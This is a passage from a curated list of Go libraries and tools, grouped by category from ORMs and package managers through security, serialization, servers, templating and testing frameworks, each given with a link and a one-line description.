[reform](https://github.com/go-reform/reform) - Better ORM for Go, based on non-empty interfaces and code generation.\n- [rel](https://github.com/go-rel/rel) - Modern Database Access Layer for Golang - Testable, Extendable and Crafted Into a Clean and Elegant API.\n- [SQLBoiler](https://github.com/volatiletech/sqlboiler) - ORM generator. Generate a featureful and blazing-fast ORM tailored to your database schema.\n- [upper.io/db](https://github.com/upper/db) - Single interface for interacting with different data sources through the use of adapters that wrap mature database drivers.\n- [XORM](https://gitea.com/xorm/xorm) - Simple and powerful ORM for Go. (Support: MySQL, MyMysql, PostgreSQL, Tidb, SQLite3, MsSql and Oracle).\n- [Zoom](https://github.com/albrow/zoom) - Blazing-fast datastore and querying engine built on Redis.\n\n**[⬆ back to top](#contents)**\n\n## Package Management\n\n_Official tooling for dependency and package management_\n\n- [go modules](https://golang.org/cmd/go/#hdr-Modules__module_versions__and_more) - Modules are the unit of source code interchange and versioning. The go command has direct support for working with modules, including recording and resolving dependencies on other modules.\n\n_Official experimental tooling for package management_\n\n- [dep](https://github.com/golang/dep) - Go dependency tool.\n- [vgo](https://go.googlesource.com/vgo/) - Versioned Go.\n\n_Unofficial libraries for package and dependency management._\n\n- [glide](https://github.com/Masterminds/glide) - Manage your golang vendor and vendored packages with ease. Inspired by tools like Maven, Bundler, and Pip.\n- [godep](https://github.com/tools/godep) - dependency tool for go, godep helps build packages reproducibly by fixing their dependencies.\n- [gom](https://github.com/mattn/gom) - Go Manager - bundle for go.\n- [goop](https://github.com/nitrous-io/goop) - Simple dependency manager for Go (golang), inspired by Bundler.\n- [gop](https://github.com/lunny/gop) - Build and manage your Go applications out of GOPATH.\n- [gopm](https://github.com/gpmgo/gopm) - Go Package Manager.\n- [govendor](https://github.com/kardianos/govendor) - Go Package Manager. Go vendor tool that works with the standard vendor file.\n- [gpm](https://github.com/pote/gpm) - Barebones dependency manager for Go.\n- [gup](https://github.com/nao1215/gup) - Update binaries installed by \"go install\".\n- [johnny-deps](https://github.com/VividCortex/johnny-deps) - Minimal dependency version using Git.\n- [modgv](https://github.com/lucasepe/modgv) - Converts 'go mod graph' output into Graphviz's DOT language.\n- [mvn-golang](https://github.com/raydac/mvn-golang) - plugin that provides way for auto-loading of Golang SDK, dependency management and start build environment in Maven project infrastructure.\n- [nut](https://github.com/jingweno/nut) - Vendor Go dependencies.\n- [VenGO](https://github.com/DamnWidget/VenGO) - create and manage exportable isolated go virtual environments.\n\n**[⬆ back to top](#contents)**\n\n## Performance\n\n- [go-instrument](https://github.com/nikolaydubina/go-instrument) - Automatically add spans to all methods and functions.\n- [jaeger](https://github.com/jaegertracing/jaeger) - A distributed tracing system.\n- [pixie](https://github.com/pixie-labs/pixie) - No instrumentation tracing for Golang applications via eBPF.\n- [profile](https://github.com/pkg/profile) - Simple profiling support package for Go.\n- [statsviz](https://github.com/arl/statsviz) - Live visualization of your Go application runtime statistics.\n- [tracer](https://github.com/kamilsk/tracer) - Simple, lightweight tracing.\n\n**[⬆ back to top](#contents)**\n\n## Query Language\n\n- [api-fu](https://github.com/ccbrown/api-fu) - Comprehensive GraphQL implementation.\n- [dasel](https://github.com/tomwright/dasel) - Query and update data structures using selectors from the command line. Comparable to jq/yq but supports JSON, YAML, TOML and XML with zero runtime dependencies.\n- [gojsonq](https://github.com/thedevsaddam/gojsonq) - A simple Go package to Query over JSON Data.\n- [goven](https://github.com/SeldonIO/goven) - A drop-in query language for any database schema.\n- [gqlgen](https://github.com/99designs/gqlgen) - go generate based graphql server library.\n- [grapher](https://github.com/reaganiwadha/grapher) - A GraphQL field builder utilizing Go generics with extra utilities and features.\n- [graphql](https://github.com/tmc/graphql) - graphql parser + utilities.\n- [graphql](https://github.com/neelance/graphql-go) - GraphQL server with a focus on ease of use.\n- [graphql-go](https://github.com/graphql-go/graphql) - Implementation of GraphQL for Go.\n- [gws](https://github.com/Zaba505/gws) - Apollos' \"GraphQL over Websocket\" client and server implementation.\n- [jsonpath](https://github.com/AsaiYusuke/jsonpath) - A query library for retrieving part of JSON based on JSONPath syntax.\n- [jsonql](https://github.com/elgs/jsonql) - JSON query expression library in Golang.\n- [jsonslice](https://github.com/bhmj/jsonslice) - Jsonpath queries with advanced filters.\n- [rql](https://github.com/a8m/rql) - Resource Query Language for REST API.\n- [rqp](https://github.com/timsolov/rest-query-parser) - Query Parser for REST API. Filtering, validations, both `AND`, `OR` operations are supported directly in the query.\n- [straf](https://github.com/SonicRoshan/straf) - Easily Convert Golang structs to GraphQL objects.\n\n**[⬆ back to top](#contents)**\n\n## Resource Embedding\n\n- [debme](https://github.com/leaanthony/debme) - Create an `embed.FS` from an existing `embed.FS` subdirectory.\n- [esc](https://github.com/mjibson/esc) - Embeds files into Go programs and provides http.FileSystem interfaces to them.\n- [fileb0x](https://github.com/UnnoTed/fileb0x) - Simple tool to embed files in go with focus on \"customization\" and ease to use.\n- [go-resources](https://github.com/omeid/go-resources) - Unfancy resources embedding with Go.\n- [go.rice](https://github.com/GeertJohan/go.rice) - go.rice is a Go package that makes working with resources such as HTML, JS, CSS, images, and templates very easy.\n- [mule](https://github.com/wlbr/mule) - Embed external resources like images, movies ... into Go source code to create single file binaries using `go generate`. Focused on simplicity.\n- [packr](https://github.com/gobuffalo/packr) - The simple and easy way to embed static files into Go binaries.\n- [rebed](https://github.com/soypat/rebed) - Recreate folder structures and files from Go 1.16's `embed.FS` type\n- [statics](https://github.com/go-playground/statics) - Embeds static resources into go files for single binary compilation + works with http.FileSystem + symlinks.\n- [statik](https://github.com/rakyll/statik) - Embeds static files into a Go executable.\n- [templify](https://github.com/wlbr/templify) - Embed external template files into Go code to create single file binaries.\n- [vfsgen](https://github.com/shurcooL/vfsgen) - Generates a vfsdata.go file that statically implements the given virtual filesystem.\n\n**[⬆ back to top](#contents)**\n\n## Science and Data Analysis\n\n_Libraries for scientific computing and data analyzing._\n\n- [assocentity](https://github.com/ndabAP/assocentity) - Package assocentity returns the average distance from words to a given entity.\n- [bradleyterry](https://github.com/seanhagen/bradleyterry) - Provides a Bradley-Terry Model for pairwise comparisons.\n- [calendarheatmap](https://github.com/nikolaydubina/calendarheatmap) - Calendar heatmap in plain Go inspired by Github contribution activity.\n- [chart](https://github.com/vdobler/chart) - Simple Chart Plotting library for Go. Supports many graphs types.\n- [dataframe-go](https://github.com/rocketlaunchr/dataframe-go) - Dataframes for machine-learning and statistics (similar to pandas).\n- [decimal](https://github.com/db47h/decimal) - Package decimal implements arbitrary-precision decimal floating-point arithmetic.\n- [evaler](https://github.com/soniah/evaler) - Simple floating point arithmetic expression evaluator.\n- [ewma](https://github.com/VividCortex/ewma) - Exponentially-weighted moving averages.\n- [geom](https://github.com/skelterjohn/geom) - 2D geometry for golang.\n- [go-dsp](https://github.com/mjibson/go-dsp) - Digital Signal Processing for Go.\n- [go-estimate](https://github.com/milosgajdos/go-estimate) - State estimation and filtering algorithms in Go.\n- [go-gt](https://github.com/ThePaw/go-gt) - Graph theory algorithms written in \"Go\" language.\n- [godesim](https://github.com/soypat/godesim) - Extended/multivariable ODE solver framework for event-based simulations with simple API.\n- [goent](https://github.com/kzahedi/goent) - GO Implementation of Entropy Measures.\n- [gograph](https://github.com/hmdsefi/gograph) - A golang generic graph library that provides mathematical graph-theory and algorithms.\n- [gohistogram](https://github.com/VividCortex/gohistogram) - Approximate histograms for data streams.\n- [gonum](https://github.com/gonum/gonum) - Gonum is a set of numeric libraries for the Go programming language. It contains libraries for matrices, statistics, optimization, and more.\n- [gonum/plot](https://github.com/gonum/plot) - gonum/plot provides an API for building and drawing plots in Go.\n- [goraph](https://github.com/gyuho/goraph) - Pure Go graph theory library(data structure, algorithm visualization).\n- [gosl](https://github.com/cpmech/gosl) - Go scientific library for linear algebra, FFT, geometry, NURBS, numerical methods, probabilities, optimisation, differential equations, and more.\n- [GoStats](https://github.com/OGFris/GoStats) - GoStats is an Open Source GoLang library for math statistics mostly used in Machine Learning domains, it covers most of the Statistical measures functions.\n- [graph](https://github.com/yourbasic/graph) - Library of basic graph algorithms.\n- [jsonl-graph](https://github.com/nikolaydubina/jsonl-graph) - Tool to manipulate JSONL graphs with graphviz support.\n- [ode](https://github.com/ChristopherRabotin/ode) - Ordinary differential equation (ODE) solver which supports extended states and channel-based iteration stop conditions.\n- [orb](https://github.com/paulmach/orb) - 2D geometry types with clipping, GeoJSON and Mapbox Vector Tile support.\n- [pagerank](https://github.com/alixaxel/pagerank) - Weighted PageRank algorithm implemented in Go.\n- [piecewiselinear](https://github.com/sgreben/piecewiselinear) - Tiny linear interpolation library.\n- [PiHex](https://github.com/claygod/PiHex) - Implementation of the \"Bailey-Borwein-Plouffe\" algorithm for the hexadecimal number Pi.\n- [rootfinding](https://github.com/khezen/rootfinding) - root-finding algorithms library for finding roots of quadratic functions.\n- [sparse](https://github.com/james-bowman/sparse) - Go Sparse matrix formats for linear algebra supporting scientific and machine learning applications, compatible with gonum matrix libraries.\n- [stats](https://github.com/montanaflynn/stats) - Statistics package with common functions missing from the Golang standard library.\n- [streamtools](https://github.com/nytlabs/streamtools) - general purpose, graphical tool for dealing with streams of data.\n- [TextRank](https://github.com/DavidBelicza/TextRank) - TextRank implementation in Golang with extendable features (summarization, weighting, phrase extraction) and multithreading (goroutine) support.\n- [triangolatte](https://github.com/tchayen/triangolatte) - 2D triangulation library. Allows translating lines and polygons (both based on points) to the language of GPUs.\n\n**[⬆ back to top](#contents)**\n\n## Security\n\n_Libraries that are used to help make your application more secure._\n\n- [acmetool](https://github.com/hlandau/acme) - ACME (Let's Encrypt) client tool with automatic renewal.\n- [acra](https://github.com/cossacklabs/acra) - Network encryption proxy to protect database-based applications from data leaks: strong selective encryption, SQL injections prevention, intrusion detection system.\n- [age](https://github.com/FiloSottile/age) - A simple, modern and secure encryption tool (and Go library) with small explicit keys, no config options, and UNIX-style composability.\n- [argon2-hashing](https://github.com/andskur/argon2-hashing) - light wrapper around Go's argon2 package that closely mirrors with Go's standard library Bcrypt and simple-scrypt package.\n- [argon2pw](https://github.com/raja/argon2pw) - Argon2 password hash generation with constant-time password comparison.\n- [autocert](https://godoc.org/golang.org/x/crypto/acme/autocert) - Auto provision Let's Encrypt certificates and start a TLS server.\n- [BadActor](https://github.com/jaredfolkins/badactor) - In-memory, application-driven jailer built in the spirit of fail2ban.\n- [booster](https://github.com/anatol/booster) - Fast initramfs generator with full-disk encryption support.\n- [Cameradar](https://github.com/Ullaakut/cameradar) - Tool and library to remotely hack RTSP streams from surveillance cameras.\n- [certificates](https://github.com/mvmaasakkers/certificates) - An opinionated tool for generating tls certificates.\n- [CertMagic](https://github.com/caddyserver/certmagic) - Mature, robust, and powerful ACME client integration for fully-managed TLS certificate issuance and renewal.\n- [Coraza](https://github.com/corazawaf/coraza) - Enterprise-ready, modsecurity and OWASP CRS compatible WAF library.\n- [dongle](https://github.com/golang-module/dongle) - A simple, semantic and developer-friendly golang package for encoding&decoding and encryption&decryption.\n- [firewalld-rest](https://github.com/prashantgupta24/firewalld-rest) - A rest application to dynamically update firewalld rules on a linux server.\n- [go-generate-password](https://github.com/m1/go-generate-password) - Password generator that can be used on the cli or as a library.\n- [go-htpasswd](https://github.com/tg123/go-htpasswd) - Apache htpasswd Parser for Go.\n- [go-password-validator](https://github.com/lane-c-wagner/go-password-validator) - Password validator based on raw cryptographic entropy values.\n- [go-yara](https://github.com/hillu/go-yara) - Go Bindings for [YARA](https://github.com/plusvic/yara), the \"pattern matching swiss knife for malware researchers (and everyone else)\".\n- [goArgonPass](https://github.com/dwin/goArgonPass) - Argon2 password hash and verification designed to be compatible with existing Python and PHP implementations.\n- [goSecretBoxPassword](https://github.com/dwin/goSecretBoxPassword) - A probably paranoid package for securely hashing and encrypting passwords.\n- [Interpol](https://github.com/avahidi/interpol) - Rule-based data generator for fuzzing and penetration testing.\n- [lego](https://github.com/go-acme/lego) - Pure Go ACME client library and CLI tool (for use with Let's Encrypt).\n- [memguard](https://github.com/awnumar/memguard) - A pure Go library for handling sensitive values in memory.\n- [nacl](https://github.com/kevinburke/nacl) - Go implementation of the NaCL set of API's.\n- [optimus-go](https://github.com/pjebs/optimus-go) - ID hashing and Obfuscation using Knuth's Algorithm.\n- [passlib](https://github.com/hlandau/passlib) - Futureproof password hashing library.\n- [secret](https://github.com/rsjethani/secret) - Prevent your secrets from leaking into logs, std\\* etc.\n- [secure](https://github.com/unrolled/secure) - HTTP middleware for Go that facilitates some quick security wins.\n- [secureio](https://github.com/xaionaro-go/secureio) - An keyexchanging+authenticating+encrypting wrapper and multiplexer for `io.ReadWriteCloser` based on XChaCha20-poly1305, ECDH and ED25519.\n- [simple-scrypt](https://github.com/elithrar/simple-scrypt) - Scrypt package with a simple, obvious API and automatic cost calibration built-in.\n- [ssh-vault](https://github.com/ssh-vault/ssh-vault) - encrypt/decrypt using ssh keys.\n- [sslmgr](https://github.com/adrianosela/sslmgr) - SSL certificates made easy with a high level wrapper around acme/autocert.\n- [teler-waf](https://github.com/kitabisa/teler-waf) - teler-waf is a Go HTTP middleware that provide teler IDS functionality to protect against web-based attacks and improve the security of Go-based web applications. It is highly configurable and easy to integrate into existing Go applications.\n- [themis](https://github.com/cossacklabs/themis) - high-level cryptographic library for solving typical data security tasks (secure data storage, secure messaging, zero-knowledge proof authentication), available for 14 languages, best fit for multi-platform apps.\n\n**[⬆ back to top](#contents)**\n\n## Serialization\n\n_Libraries and tools for binary serialization._\n\n- [asn1](https://github.com/PromonLogicalis/asn1) - Asn.1 BER and DER encoding library for golang.\n- [bambam](https://github.com/glycerine/bambam) - generator for Cap'n Proto schemas from go.\n- [bel](https://github.com/32leaves/bel) - Generate TypeScript interfaces from Go structs/interfaces. Useful for JSON RPC.\n- [binstruct](https://github.com/ghostiam/binstruct) - Golang binary decoder for mapping data into the structure.\n- [cbor](https://github.com/fxamacker/cbor) - Small, safe, and easy CBOR encoding and decoding library.\n- [colfer](https://github.com/pascaldekloe/colfer) - Code generation for the Colfer binary format.\n- [csvutil](https://github.com/jszwec/csvutil) - High Performance, idiomatic CSV record encoding and decoding to native Go structures.\n- [elastic](https://github.com/epiclabs-io/elastic) - Convert slices, maps or any other unknown value across different types at run-time, no matter what.\n- [fixedwidth](https://github.com/huydang284/fixedwidth) - Fixed-width text formatting (UTF-8 supported).\n- [fwencoder](https://github.com/o1egl/fwencoder) - Fixed width file parser (encoding and decoding library) for Go.\n- [go-capnproto](https://github.com/glycerine/go-capnproto) - Cap'n Proto library and parser for go.\n- [go-codec](https://github.com/ugorji/go) - High Performance, feature-Rich, idiomatic encode, decode and rpc library for msgpack, cbor and json, with runtime-based OR code-generation support.\n- [go-lctree](https://github.com/sbourlon/go-lctree) - Provides a CLI and primitives to serialize and deserialize [LeetCode binary trees](https://support.leetcode.com/hc/en-us/articles/360011883654-What-does-1-null-2-3-mean-in-binary-tree-representation).\n- [gogoprotobuf](https://github.com/gogo/protobuf) - Protocol Buffers for Go with Gadgets.\n- [goprotobuf](https://github.com/golang/protobuf) - Go support, in the form of a library and protocol compiler plugin, for Google's protocol buffers.\n- [jsoniter](https://github.com/json-iterator/go) - High-performance 100% compatible drop-in replacement of \"encoding/json\".\n- [mapstructure](https://github.com/mitchellh/mapstructure) - Go library for decoding generic map values into native Go structures.\n- [php_session_decoder](https://github.com/yvasiyarov/php_session_decoder) - GoLang library for working with PHP session format and PHP Serialize/Unserialize functions.\n- [pletter](https://github.com/vimeda/pletter) - A standard way to wrap a proto message for message brokers.\n- [structomap](https://github.com/tuvistavie/structomap) - Library to easily and dynamically generate maps from static structures.\n- [unitpacking](https://github.com/recolude/unitpacking) - Library to pack unit vectors into as fewest bytes as possible.\n\n**[⬆ back to top](#contents)**\n\n## Server Applications\n\n- [algernon](https://github.com/xyproto/algernon) - HTTP/2 web server with built-in support for Lua, Markdown, GCSS and Amber.\n- [Caddy](https://github.com/caddyserver/caddy) - Caddy is an alternative, HTTP/2 web server that's easy to configure and use.\n- [consul](https://www.consul.io/) - Consul is a tool for service discovery, monitoring and configuration.\n- [cortex-tenant](https://github.com/blind-oracle/cortex-tenant) - Prometheus remote write proxy that adds add Cortex tenant ID header based on metric labels.\n- [devd](https://github.com/cortesi/devd) - Local webserver for developers.\n- [discovery](https://github.com/Bilibili/discovery) - A registry for resilient mid-tier load balancing and failover.\n- [dudeldu](https://github.com/krotik/dudeldu) - A simple SHOUTcast server.\n- [dummy](https://github.com/neotoolkit/dummy) - Run mock server based off an API contract with one command.\n- [Easegress](https://github.com/megaease/easegress) - A cloud native high availability/performance traffic orchestration system with observability and extensibility.\n- [etcd](https://github.com/coreos/etcd) - Highly-available key value store for shared configuration and service discovery.\n- [Euterpe](https://github.com/ironsmile/euterpe) - Self-hosted music streaming server with built-in web UI and REST API.\n- [Fider](https://github.com/getfider/fider) - Fider is an open platform to collect and organize customer feedback.\n- [Flagr](https://github.com/checkr/flagr) - Flagr is an open-source feature flagging and A/B testing service.\n- [flipt](https://github.com/markphelps/flipt) - A self contained feature flag solution written in Go and Vue.js\n- [go-feature-flag](https://github.com/thomaspoignant/go-feature-flag) - A feature flag solution, with only a YAML file in the backend (S3, GitHub, HTTP, local file ...), no server to install, just add a file in a central system and refer to it.\n- [go-proxy-cache](https://github.com/fabiocicerchia/go-proxy-cache) - Simple Reverse Proxy with Caching, written in Go, using Redis.\n- [jackal](https://github.com/ortuman/jackal) - An XMPP server written in Go.\n- [lets-proxy2](https://github.com/rekby/lets-proxy2) - Reverse proxy for handle https with issue certificates in fly from lets-encrypt.\n- [minio](https://github.com/minio/minio) - Minio is a distributed object storage server.\n- [Moxy](https://github.com/sinhashubham95/moxy) - Moxy is a simple mocker and proxy application server, you can create mock endpoints as well as proxy requests in case no mock exists for the endpoint.\n- [nginx-prometheus](https://github.com/blind-oracle/nginx-prometheus) - Nginx log parser and exporter to Prometheus.\n- [nsq](https://nsq.io/) - A realtime distributed messaging platform.\n- [protoxy](https://github.com/camgraff/protoxy) - A proxy server that converts JSON request bodies to Protocol Buffers.\n- [psql-streamer](https://github.com/blind-oracle/psql-streamer) - Stream database events from PostgreSQL to Kafka.\n- [riemann-relay](https://github.com/blind-oracle/riemann-relay) - Relay to load-balance Riemann events and/or convert them to Carbon.\n- [RoadRunner](https://github.com/spiral/roadrunner) - High-performance PHP application server, load-balancer and process manager.\n- [SFTPGo](https://github.com/drakkan/sftpgo) - Fully featured and highly configurable SFTP server with optional FTP/S and WebDAV support. It can serve local filesystem and Cloud Storage backends such as S3 and Google Cloud Storage.\n- [simple-jwt-provider](https://github.com/leberKleber/simple-jwt-provider) - Simple and lightweight provider which exhibits JWTs, supports login, password-reset (via mail) and user management.\n- [Trickster](https://github.com/tricksterproxy/trickster) - HTTP reverse proxy cache and time series accelerator.\n- [Wish](https://github.com/charmbracelet/wish) - Make SSH apps, just like that!\n\n**[⬆ back to top](#contents)**\n\n## Stream Processing\n\n_Libraries and tools for stream processing and reactive programming._\n\n- [go-streams](https://github.com/reugn/go-streams) - Go stream processing library.\n- [goio](https://github.com/primetalk/goio) - An implementation of IO, Stream, Fiber for Golang, inspired by awesome Scala libraries cats and fs2.\n- [machine](https://github.com/whitaker-io/machine) - Go library for writing and generating stream workers with built in metrics and traceability.\n- [stream](https://github.com/youthlin/stream) - Go Stream, like Java 8 Stream: Filter/Map/FlatMap/Peek/Sorted/ForEach/Reduce...\n\n**[⬆ back to top](#contents)**\n\n## Template Engines\n\n_Libraries and tools for templating and lexing._\n\n- [ego](https://github.com/benbjohnson/ego) - Lightweight templating language that lets you write templates in Go. Templates are translated into Go and compiled.\n- [extemplate](https://github.com/dannyvankooten/extemplate) - Tiny wrapper around html/template to allow for easy file-based template inheritance.\n- [fasttemplate](https://github.com/valyala/fasttemplate) - Simple and fast template engine. Substitutes template placeholders up to 10x faster than [text/template](https://golang.org/pkg/text/template/).\n- [gospin](https://github.com/m1/gospin) - Article spinning and spintax/spinning syntax engine, useful for A/B, testing pieces of text/articles and creating more natural conversations.\n- [got](https://github.com/goradd/got) - A Go code generator inspired by Hero and Fasttemplate. Has include files, custom tag definitions, injected Go code, language translation, and more.\n- [goview](https://github.com/foolin/goview) - Goview is a lightweight, minimalist and idiomatic template library based on golang html/template for building Go web application.\n- [jet](https://github.com/CloudyKit/jet) - Jet template engine.\n- [liquid](https://github.com/osteele/liquid) - Go implementation of Shopify Liquid templates.\n- [maroto](https://github.com/johnfercher/maroto) - A maroto way to create PDFs. Maroto is inspired in Bootstrap and uses gofpdf. Fast and simple.\n- [pongo2](https://github.com/flosch/pongo2) - Django-like template-engine for Go.\n- [quicktemplate](https://github.com/valyala/quicktemplate) - Fast, powerful, yet easy to use template engine. Converts templates into Go code and then compiles it.\n- [raymond](https://github.com/aymerick/raymond) - Complete handlebars implementation in Go.\n- [Razor](https://github.com/sipin/gorazor) - Razor view engine for Golang.\n- [Soy](https://github.com/robfig/soy) - Closure templates (aka Soy templates) for Go, following the [official spec](https://developers.google.com/closure/templates/).\n- [sprig](https://github.com/Masterminds/sprig) - Useful template functions for Go templates.\n- [tbd](https://github.com/lucasepe/tbd) - A really simple way to create text templates with placeholders - exposes extra builtin Git repo metadata.\n\n**[⬆ back to top](#contents)**\n\n## Testing\n\n_Libraries for testing codebases and generating test data._\n\n- Testing Frameworks\n\n - [apitest](https://apitest.dev) - Simple and extensible behavioural testing library for REST based services or HTTP handlers that supports mocking external http calls and rendering of sequence diagrams.\n - [assert](https://github.com/go-playground/assert) - Basic Assertion Library used along side native go testing, with building blocks for custom assertions.\n - [badio](https://github.com/cavaliercoder/badio) - Extensions to Go's `testing/iotest` package.\n - [baloo](https://github.com/h2non/baloo) - Expressive and versatile end-to-end HTTP API testing made easy.\n - [be](https://github.com/carlmjohnson/be) - The minimalist generic test assertion library.\n - [biff](https://github.com/fulldump/biff) - Bifurcation testing framework, BDD compatible.\n - [charlatan](https://github.com/percolate/charlatan) - Tool to generate fake interface implementations for tests.\n - [commander](https://github.com/SimonBaeumer/commander) - Tool for testing cli applications on windows, linux and osx.\n - [covergates](https://github.com/covergates/covergates) - Self-hosted code coverage report review and management service.\n - [cupaloy](https://github.com/bradleyjkemp/cupaloy) - Simple snapshot testing addon for your test framework.\n - [dbcleaner](https://github.com/khaiql/dbcleaner) - Clean database for testing purpose, inspired by `database_cleaner` in Ruby.\n - [dsunit](https://github.com/viant/dsunit) - Datastore testing for SQL, NoSQL, structured files.\n - [embedded-postgres](https://github.com/fergusstrange/embedded-postgres) - Run a real Postgres database locally on Linux, OSX or Windows as part of another Go application or test.\n - [endly](https://github.com/viant/endly) - Declarative end to end functional testing.\n - [fixenv](https://github.com/rekby/fixenv) - Fixture manage engine, inspired by pytest fixtures.\n - [fluentassert](https://github.com/fluentassert/verify) - Extensible, type-safe, fluent assertion Go library.\n - [flute](https://github.com/suzuki-shunsuke/flute) - HTTP client testing framework.\n - [frisby](https://github.com/verdverm/frisby) - REST API testing framework.\n - [gherkingen](https://github.com/hedhyw/gherkingen) - BDD boilerplate generator and framework.\n - [ginkgo](https://onsi.github.io/ginkgo/) - BDD Testing Framework for Go.\n - [gnomock](https://github.com/orlangure/gnomock) - integration testing with real dependencies (database, cache, even Kubernetes or AWS) running in Docker, without mocks.\n - [go-carpet](https://github.com/msoap/go-carpet) - Tool for viewing test coverage in terminal.\n - [go-cmp](https://github.com/google/go-cmp) - Package for comparing Go values in tests.\n - [go-hit](https://github.com/Eun/go-hit) - Hit is an http integration test framework written in golang.\n - [go-mutesting](https://github.com/zimmski/go-mutesting) - Mutation testing for Go source code.\n - [go-mysql-test-container](https://github.com/arikama/go-mysql-test-container) - Golang MySQL testcontainer to help with MySQL integration testing.\n - [go-snaps](http://github.com/gkampitakis/go-snaps) - Jest-like snapshot testing in Golang.\n - [go-testdeep](https://github.com/maxatome/go-testdeep) - Extremely flexible golang deep comparison, extends the go testing package.\n - [go-testpredicate](https://github.com/maargenton/go-testpredicate) - Test predicate style assertions library with extensive diagnostics output.\n - [go-vcr](https://github.com/dnaeon/go-vcr) - Record and replay your HTTP interactions for fast, deterministic and accurate tests.\n - [goblin](https://github.com/franela/goblin) - Mocha like testing framework fo Go.\n - [goc](https://github.com/qiniu/goc) - Goc is a comprehensive coverage testing system for The Go Programming Language.\n - [gocheck](https://labix.org/gocheck) - More advanced testing framework alternative to gotest.\n - [GoConvey](https://github.com/smartystreets/goconvey/) - BDD-style framework with web UI and live reload.\n - [gocrest](https://github.com/corbym/gocrest) - Composable hamcrest-like matchers for Go assertions.\n - [godog](https://github.com/cucumber/godog) - Cucumber BDD framework for Go.\n - [gofight](https://github.com/appleboy/gofight) - API Handler Testing for Golang Router framework.\n - [gogiven](https://github.com/corbym/gogiven) - YATSPEC-like BDD testing framework for Go.\n - [gomatch](https://github.com/jfilipczyk/gomatch) - library created for testing JSON against patterns.\n - [gomega](https://onsi.github.io/gomega/) - Rspec like matcher/assertion library.\n - [Gont](https://github.com/stv0g/gont) - Go network testing toolkit for testing building complex network topologies using Linux namespaces.\n - [GoSpec](https://github.com/orfjackal/gospec) - BDD-style testing framework for the Go programming language.\n - [gospecify](https://github.com/stesla/gospecify) - This provides a BDD syntax for testing your Go code. It should be familiar to anybody who has used libraries such as rspec.\n - [gosuite](https://github.com/pavlo/gosuite) - Brings lightweight test suites with setup/teardown facilities to `testing` by leveraging Go1.7's Subtests.\n - [got](https://github.com/ysmood/got) - An enjoyable golang test framework.\n - [gotest.tools](https://github.com/gotestyourself/gotest.tools) - A collection of packages to augment the go testing package and support common patterns.\n - [Hamcrest](https://github.com/rdrdr/hamcrest) - fluent framework for declarative Matcher objects that, when applied to input values, produce self-describing results.\n - [httpexpect](https://github.com/gavv/httpexpect) - Concise, declarative, and easy to use end-to-end HTTP and REST API testing.\n - [is](https://github.com/matryer/is) - Professional lightweight testing mini-framework for Go.\n - [jsonassert](https://github.com/kinbiko/jsonassert) - Package for verifying that your JSON payloads are serialized correctly.\n - [omg.testingtools](https://github.com/dedalqq/omg.testingtools) - The simple library for change a values of private fields for testing.\n - [restit](https://github.com/yookoala/restit) - Go micro framework to help writing RESTful API integration test.\n - [schema](https://github.com/jgroeneveld/schema) - Quick and easy expression matching for JSON schemas used in requests and responses.\n - [stop-and-go](https://github.com/elgohr/stop-and-go) - Testing helper for concurrency.\n - [testcase](https://github.com/adamluzsi/testcase) - Idiomatic testing framework for Behavior Driven Development.\n - [testcontainers-go](https://github.com/testcontainers/testcontainers-go) - A Go package that makes it simple to create and clean up container-based dependencies for automated integration/smoke tests. The clean, easy-to-use API enables developers to programmatically define containers that should be run as part of a test and clean up those resources when the test is done.\n - [testfixtures](https://github.com/go-testfixtures/testfixtures) - A helper for Rails' like test fixtures to test database applications.\n - [Testify](https://github.com/stretchr/testify) - Sacred extension to the standard go testing package.\n - [testmd](https://godoc.org/github.com/tvastar/test/cmd/testmd) - Convert markdown snippets into testable go code.\n - [testsql](https://github.com/zhulongcheng/testsql) - Generate test data from SQL files before testing and clear it after finished.\n - [testza](https://github.com/MarvinJWendt/testza) - Full-featured test framework with nice colorized output.\n - [trial](https://github.com/jgroeneveld/trial) - Quick and easy extendable assertions without introducing much boilerplate.\n - [Tt](https://github.com/vcaesar/tt) - Simple and colorful test tools.\n - [wstest](https://github.com/posener/wstest) - Websocket client for unit-testing a websocket http.Handler.\n\n- Mock\n\n - [counterfeiter](https://github.com/maxbrunsfeld/counterfeiter) - Tool for generating self-contained mock objects.\n - [genmock](https://gitlab.com/so_literate/genmock) - Go mocking system with code generator for building calls of the interface methods.\n - [go-localstack](https://github.com/elgohr/go-localstack) - Tool for using localstack in AWS testing.\n - [go-sqlmock](https://github.com/DATA-DOG/go-sqlmock) - Mock SQL driver for testing database interactions.\n - [go-txdb](https://github.com/DATA-DOG/go-txdb) - Single transaction based database driver mainly for testing purposes.\n - [gock](https://github.com/h2non/gock) - Versatile HTTP mocking made easy.\n - [gomock](https://github.com/golang/mock) - Mocking framework for the Go programming language.\n - [govcr](https://github.com/seborama/govcr) - HTTP mock for Golang: record and replay HTTP interactions for offline testing.\n - [hoverfly](https://github.com/SpectoLabs/hoverfly) - HTTP(S) proxy for recording and simulating REST/SOAP APIs with extensible middleware and easy-to-use CLI.\n - [httpmock](https://github.com/jarcoal/httpmock) - Easy mocking of HTTP responses from external resources.\n - [minimock](https://github.com/gojuno/minimock) - Mock generator for Go interfaces.\n - [mockery](https://github.com/vektra/mockery) - Tool to generate Go interfaces.\n - [mockhttp](https://github.com/tv42/mockhttp) - Mock object for Go http.ResponseWriter.\n - [mockit](https://github.com/pasdam/mockit) - Allows functions and method easy mocking, without defining new types; it's similar to Mockito for Java.\n - [monkey](https://github.com/awterman/monkey) - One line to mock functions/methods/variables in place without dependency injection or code generation.\n - [mooncake](https://github.com/GuilhermeCaruso/mooncake) - A simple way to generate mocks for multiple purposes\n - [timex](https://github.com/cabify/timex) - A test-friendly replacement for the native `time` package.\n\n- Fuzzing and delta-debugging/reducing/shrinking.\n\n - [go-fuzz](https://github.com/dvyukov/go-fuzz) - Randomized testing system.\n - [gofuzz](https://github.com/google/gofuzz) - Library for populating go objects with random values.\n - [Tavor](https://github.com/zimmski/tavor) - Generic fuzzing and delta-debugging framework.\n\n- Selenium and browser control tools.\n\n - [cdp](https://github.com/mafredri/cdp) - Type-safe bindings for the Chrome Debugging Protocol that can be used with browsers or other debug targets that implement it.\n - [chromedp](https://github.com/knq/chromedp) - a way to drive/test Chrome, Safari, Edge, Android Webviews, and other browsers supporting the Chrome Debugging Protocol.\n - [ggr](https://github.com/aerokube/ggr) - a lightweight server that routes and proxies Selenium WebDriver requests to multiple Selenium hubs.\n - [playwright-go](https://github.com/mxschmitt/playwright-go) - browser automation library to control Chromium, Firefox and WebKit with a single API.\n - [rod](https://github.com/go-rod/rod) - A Devtools driver to make web automation and scraping 